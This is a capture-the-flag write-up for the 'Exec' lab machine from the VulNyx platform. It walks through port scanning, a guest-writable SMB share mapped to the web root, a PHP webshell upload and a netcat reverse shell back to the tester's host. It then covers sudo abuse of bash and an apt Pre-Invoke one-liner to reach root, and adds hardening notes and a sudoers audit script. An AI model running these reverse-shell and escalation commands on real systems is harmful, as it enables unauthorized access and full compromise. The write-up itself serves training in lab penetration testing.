🔵 NYX - Exec

#vulnyx #nyx #linux #rce #smb #bash (sudo) #apt (sudo)

April 20, 2024 by Miguel R. (d4t4s3c)

Information

Exec is a Linux machine from the VulNyx platform; it has a low difficulty level and was created by the user s3cur4.

  • Initial access: I access an SMB share as guest and upload a file containing PHP code, obtaining a shell.
  • Privilege escalation: The user has sudo permissions as another user, which allows escaping to a shell as root.


Enumeration

Nmap

TCP
 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 19:20 CET
Nmap scan report for 192.168.1.74
Host is up (0.0016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
 nmap -sVC -p22,80,139,445 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 19:22 CET
Nmap scan report for 192.168.1.74
Host is up (0.00044s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp  open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
MAC Address: 08:00:27:C0:A0:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-02-12T18:22:55
|_  start_date: N/A
|_clock-skew: -2s
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Shell (www-data)

80/TCP (HTTP)

Directory Brute Force
 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.74
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================

445/TCP (SMB)

Basic Enumeration
 netexec smb 192.168.1.74
SMB   192.168.1.74   445   EXEC   [*] Windows 6.1 Build 0 (name:EXEC) (domain:EXEC) (signing:False) (SMBv1:False)
Shares (Null Session)

I find a share called server on which I have READ,WRITE permissions.

 smbclient -NL //192.168.1.74
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	server          Disk      Developer Directory
	IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
	nobody          Disk      Home Directories

 netexec smb 192.168.1.74 -u '' -p '' --shares
SMB   192.168.1.74   445   EXEC   [*] Windows 6.1 Build 0 (name:EXEC) (domain:EXEC) (signing:False) (SMBv1:False)
SMB   192.168.1.74   445   EXEC   [+] EXEC\: 
SMB   192.168.1.74   445   EXEC   [*] Enumerated shares
SMB   192.168.1.74   445   EXEC   Share           Permissions     Remark
SMB   192.168.1.74   445   EXEC   -----           -----------     ------
SMB   192.168.1.74   445   EXEC   print$                          Printer Drivers
SMB   192.168.1.74   445   EXEC   server          READ,WRITE      Developer Directory
SMB   192.168.1.74   445   EXEC   IPC$                            IPC Service (Samba 4.17.12-Debian)
SMB   192.168.1.74   445   EXEC   nobody                          Home Directories

Inside the server share there is an index.html file; it looks like the HTTP and SMB services are backed by the same directory.

 smbclient -N //192.168.1.74/server
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 15 10:45:54 2024
  ..                                  D        0  Mon Apr 15 10:04:12 2024
  index.html                          N    10701  Mon Apr 15 10:04:31 2024
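The root cause on the SMB side is a guest-writable share that maps onto the web root. The smb.conf fragments below are an added illustration, not the machine's actual configuration; the paths are assumptions (the writeup only shows that index.html is visible through both services).

```ini
; Weak: anonymous users can write into the directory Apache serves from,
; so any uploaded .php file is executed by the web server.
[server]
   comment = Developer Directory
   path = /var/www/html          ; assumed web root
   guest ok = yes
   writable = yes

; Hardened: no guest access, read-only, and the share lives outside the
; web root so an upload could never be reached through HTTP anyway.
[server]
   comment = Developer Directory
   path = /srv/samba/developer   ; assumed separate path
   guest ok = no
   valid users = @developers
   read only = yes
```

Both fragments define the same share name; only one belongs in a real smb.conf.
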
Upload (WebShell)

I try uploading a PHP webshell with put and it succeeds.

smb: \> put cmd.php
putting file cmd.php as \cmd.php (14.6 kb/s) (average 14.6 kb/s)
smb: \> ls
  .                                   D        0  Wed Feb 12 19:42:25 2025
  ..                                  D        0  Mon Apr 15 10:04:12 2024
  index.html                          N    10701  Mon Apr 15 10:04:31 2024
  cmd.php                             A       30  Wed Feb 12 19:42:25 2025
Reverse Shell

I get a shell as the www-data user.

 curl -sX GET "http://192.168.1.74/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.74] 42900
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exec

Shell (s3cur4)

The www-data user can run the bash binary as s3cur4 with sudo.

www-data@exec:/$ sudo -l
Matching Defaults entries for www-data on exec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on exec:
    (s3cur4) NOPASSWD: /usr/bin/bash

I become the s3cur4 user by abusing the privilege.

www-data@exec:/$ sudo -u s3cur4 /usr/bin/bash -i
s3cur4@exec:/$ id
uid=1000(s3cur4) gid=1000(s3cur4) groups=1000(s3cur4)

Privilege Escalation

The s3cur4 user can run the apt binary as root with sudo.

s3cur4@exec:/$ sudo -l
Matching Defaults entries for s3cur4 on exec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User s3cur4 may run the following commands on exec:
    (root) NOPASSWD: /usr/bin/apt

GTFOBins provides the one-liner to escape to a shell.

I become root by abusing the privilege.

s3cur4@exec:/$ sudo -u root /usr/bin/apt update -o APT::Update::Pre-Invoke::=/bin/sh
# bash -i
root@exec:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
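Both hops on this box (www-data to s3cur4 via bash, s3cur4 to root via apt) come from NOPASSWD sudo rules on shell-capable binaries. The script below is an added audit example, not from the writeup: it reads `sudo -l` output and flags such rules. The sample input is constructed to mirror the rules seen on Exec, and the list of risky binaries is limited to the two that appear here.

```shell
#!/bin/sh
# Added audit example, not part of the writeup: flag sudoers rules that let a
# user run, without a password, a binary that can break out into a shell.
# Input is the output of `sudo -l` for one account, read from stdin.

# Binaries GTFOBins documents as shell-capable; only the two seen on this box
# are listed here, extend as needed.
SHELL_CAPABLE="/usr/bin/bash /usr/bin/apt"

# Constructed sample mirroring the rules found on Exec, plus one benign rule.
SAMPLE_SUDO_L='Matching Defaults entries for s3cur4 on exec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User s3cur4 may run the following commands on exec:
    (s3cur4) NOPASSWD: /usr/bin/bash
    (root) NOPASSWD: /usr/bin/apt, /usr/bin/ls'

# Prints "<runas> <binary>" for each NOPASSWD rule on a shell-capable binary.
# Exit status is 1 when at least one such rule was found, 0 when clean.
flag_risky_sudo_rules() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;          # only command rules interest us
            *) continue ;;
        esac
        # Run-as target is the text in parentheses at the start of the line.
        runas=$(printf '%s\n' "$line" | sed -n 's/^[[:space:]]*(\([^)]*\)).*/\1/p')
        # Commands follow "NOPASSWD:" and may be comma-separated.
        cmds=${line#*NOPASSWD:}
        for cmd in $(printf '%s\n' "$cmds" | tr ',' ' '); do
            for risky in $SHELL_CAPABLE; do
                if [ "$cmd" = "$risky" ]; then
                    printf '%s %s\n' "$runas" "$cmd"
                    found=1
                fi
            done
        done
    done
    return $found
}

# Demo on the constructed sample; on a real host pipe in the output of
# `sudo -l` (or `sudo -l -U <user>` when run as root).
printf '%s\n' "$SAMPLE_SUDO_L" | flag_risky_sudo_rules \
    || echo "review: shell-capable NOPASSWD rules present"
```

The fix is to drop the NOPASSWD grant or, at minimum, restrict the rule to a binary and argument set that cannot spawn a shell.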

Flags

Now as root I can read the user.txt and root.txt flags.

root@exec:~# find / -name user.txt -o -name root.txt |xargs cat
97d8ad**************************
45e398**************************

That's it for the resolution of the Exec machine.

Happy Hacking!


© d4t4s3c 2023-2025
